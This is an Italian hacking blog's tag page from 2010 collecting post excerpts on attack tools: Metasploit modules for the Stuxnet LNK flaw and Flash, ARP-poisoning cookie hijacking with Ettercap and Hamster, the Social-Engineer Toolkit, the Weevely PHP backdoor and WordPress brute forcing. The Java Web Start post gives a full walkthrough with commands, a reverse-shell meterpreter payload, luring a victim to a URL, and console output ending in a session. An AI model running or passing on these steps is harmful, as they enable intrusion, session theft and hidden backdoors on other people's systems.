Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘attack’

[CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

luglio 28th, 2010 by clshack

Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.


I prodotti vulnerabili, sono:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for Itanium-based Systems

Vediamo come sfruttare questa vulnerabilità con metasploit :D
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

HTTP session hijacking with Ettercap and Hamster

luglio 18th, 2010 by clshack

Grazie ad ettercap, è possibile effettuare in semplicità attacchi arp poisoning.

Per ulteriori approfondimenti:
TUTORIAL

Hamster, è un tool, che estrae dai pacchetti catturati con wireshark, durante un attacco arp poisoning, tutti i cookie.

In questo modo, non essendo loggati, sfruttando il cookie della vittima, nel 90 % dei casi potremo usufruire delle pagine in cui è loggato, ad esempio gmail.

Dal sito ufficiale:

Hamster is a proxy server.
There are a couple ways sidejacking could work.
One way would be a browser add-on.
Another way would be as a proxy server.
The hacker would connect through the proxy, which would then rewrite the cookies on behalf of the hacker.
The following shows Hamster in action. On this screen, we see the web browser “console” screen.

Vediamo come utilizzarlo sul nostro ubuntino :D

Apriamo la nostra console o.O
sudo -s
wget http://www.clshack.it/nopaste/install_hamster.sh
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[How To] Social Engineering Toolkit with Metasploit

giugno 27th, 2010 by clshack

Il Social-Engineering Toolkit (SET) è stato realizzato da David Kennedy e mette a disposizione degli attacker alcuni notevoli exploit, di tipo Social-Engineering con una comoda interfaccia :D

L’obiettivo principale di SET è la automazione di tali attacchi, sfruttando quasi sempre la stupidità umana.

Vediamo come utilizzarlo.
sudo apt-get install python-pexpect
Dobbiamo fare un link simbolico altrimenti non va SET se non abbiamo backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Ad esempio:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


Andiamo nel terminale, e scarichiamo la versione più aggiornata:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
Una volta aperto, avremo un menù un po’ lamerico -.-’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vediamo nel dettaglio le opzioni.

1. Spear-Phishing Attack Vectors
Digitando 1, avremo sostanzialmente 3 opzioni:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07
Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.39:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.39:80/
[*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:

[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ...
[*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105
[*] Sending js detection HTML to 192.168.1.154:1105...
[*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105
[*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: , , , ,
Posted in Hacking | 5 Comments »

PHP backdoor with Weevely

giugno 25th, 2010 by clshack

Weevely è un tool studiato per creare e gestire una backdoor nascosta su webserver remoti php.

Weevely cifra le comunicazioni tra client e server dentro campi HTTP_REFERER plausibili per occultarsi a NIDS e a ricerche nei log del webserver.
Weevely permette di:


Generare la backdoor PHP cifrata dinamicamente

  • Eseguire comandi sulla shell remota, offuscando le richieste dentro HTTP_REFERER plausibili
  • Simulare un terminale per inviare comandi alla shell remota come sopra
  • Eludere alcune configurazioni di PHP che limitano l’esecuzione di comandi sul sistema
  • Eseguire moduli sulla macchina remota per automatizzare compiti.
  • Aggiungere nuovi moduli in maniera facile e veloce

Scritto in python e open source.
Per l’installazione su debian/ubuntu:
sudo apt-get install python-numpy
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 2 Comments »

[Python]WordPress brute force script :D

giugno 23rd, 2010 by clshack

Sicurezza sempre meno… colpa di chi ? Quasi sempre nostra… ad esempio un coglione H4, un po’ di tempo fa è entrato nel blog del nostro amico sskull.

Come ha fatto ?

Con un attacco brute force, il nostro amico sskull aveva lasciato una password un po’ troppo debole e quel merda di bambino è entrato…
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 11 Comments »

[tutorial]Tool for Privilege Escalation

giugno 23rd, 2010 by clshack

Letture consigliate:
[tutorial]Tool for Information Gathering
[tutorial]Tool for Network Mapping

[tutorial]Tool for Vulnerability Identification level Server
[tutorial]Tool for Vulnerability Identification level WEB

Da wikipedia, leggiamo:

Privilege escalation o in italiano scalata dei privilegi è l’atto di sfruttare una falla in un software applicativo per ottenere l’accesso a risorse che normalmente sarebbero protette da un’applicazione o dall’utente.
Il risultato è che l’applicazione esegue azioni con più privilegi di quelli dovuti e voluti dallo sviluppatore o dall’amministratore di sistema.


Pensate, ad esempio se su un server riuscissimo ad avere i privilegi root :D
In questo articolo, vedremo dei tools, che ci permettono di “scalare i privilegi”, cioè di ottenere privilegi root su linux e system su windows.
(continua…)

Tags: , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 3 Comments »

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

giugno 20th, 2010 by clshack

E dopo la gente, si chiede come fanno i virus ad entrare nei loro computer WINDOWS… fino che usate software buggati, per lo più lenti e schifosi, come flash player… speriamo che HTML 5 porti via tutto questo ;)

In tanto vediamo come sfruttare questa vulnerabilità per adobe flash palyer, con metasploit :D

Adobe Flash Player “newfunction” Invalid Pointer Use

CVE-2010-1297
This exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player.
Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code executiong is achieved by embedding a specially crafted Flash movie into a PDF document.
An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Platforms Affected:

  • Adobe Acrobat 9.0 Standard
  • Adobe Acrobat 9.0
  • Adobe Acrobat 9.0.0
  • Adobe Acrobat 9.1
  • Adobe Acrobat 9.1 Standard

    • (continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[tutorial]Tool for Vulnerability Identification level WEB

giugno 19th, 2010 by clshack

Ed eccomi di nuovo, in questo articolo, parleremo di tool, per il penetration-test, a livello di applicazioni web.
Molte volte troviamo siti defacciati, beh non è sempre colpa dei cms vulnerabili, dipende anche da modifiche da noi apportate, che magari li rendono poco sicuri.
E dopo, vi trovate index cosi:

Dopo queste:
[tutorial]Tool for Information Gathering
 [tutorial]Tool for Network Mapping
[tutorial]Tool for Vulnerability Identification level Server

Vediamo ora come identificare vulnerabilità, a livello di web applications…
I tools, da me proposti sono i seguenti:

    ===WEB VULNERABILITY SCANNER===
  • Wapiti: Web application security Scanner
  • Grendel-Scan:web application security testing tool
  • SkipFish: Google security Scanner
  • Websecurify
  • w3af:Web Application Attack and Audit Framework
  • SqlMap
  • Fimap: Scanner LFI(Local File Inclusion ) and RFI(Remote File Inclusion)

    • ===FINGER PLUGIN AND VERSION===

  • WhatWeb
  • Plecost: A WordPress Penetration-Test for Plugins
  • OWASP Joomla Vulnerability Scanner

    • ===CODE ANALYTICS===

  • RIPS:source code analyser for vulnerabilities in PHP
  • RATS: Rough Auditing Tool for Security
  • Pixy

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[tutorial]Tool for Information Gathering

giugno 2nd, 2010 by clshack

Information Gathering, ovvero come reperire informazioni da sistemi remoti e non.
Questa fase, è molto utile in un approccio ad esempio con il penetration-test.

Diciamo che prima di attaccare, bisogna sapere “cosa c’è dietro”, e questa fase ci permette di raccogliere numerose informazioni, come email, numeri di telefono, o altro utili anche per effettuare un social attack.

In backTrack, vengono messi in questa categoria, numeri software, io ne ho selezionati alcuni.
Non dico che gli altri non vadano bene, anzi , ma non posso parlare di 30 tool :D

  • theHarvester, Email, User names and Subdomain/Hostnames finder[presente in backtrack]
  • Maltego 2[presente in backtrack]
  • Fierce Domain Scan
  • httprint is a web server fingerprinting tool. [presente in backtrack]
  • DirBuster

Partiamo dal primo: theHarvester, Email, User names and Subdomain/Hostnames finder.

Questo semplice tool, scritto in python presente in backtrack, con il nome di goog email enum.

Questo tool, come dalla descrizione, permette di trovare:

  • Email;
  • User names;
  • Subdomain/Hostnames;

Sfruttando google, o altri servizi di ricerca come linklin o bing ;)
Vediamo come usarlo.
Ho messo il pacchetto sul mio sito per facilitare eventuali cambi di indirizzo ;)
Apriamo la nostra console :D
wget http://www.clshack.it/nopaste/theHarvester-1.6.tar
tar -xvf theHar*.tar
cd theH*
Bene adesso digitiamo, per un help:
python theHarvester.py
Esempio:
python theHarvester.py -d SITO_DA_CERCARE -l 100 -b bing
Ho usato bing, perché mi sa che google mi richiedeva il captcha, mi ha individuato non umano :)
(continua…)

Tags: , , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 4 Comments »
« Older Entries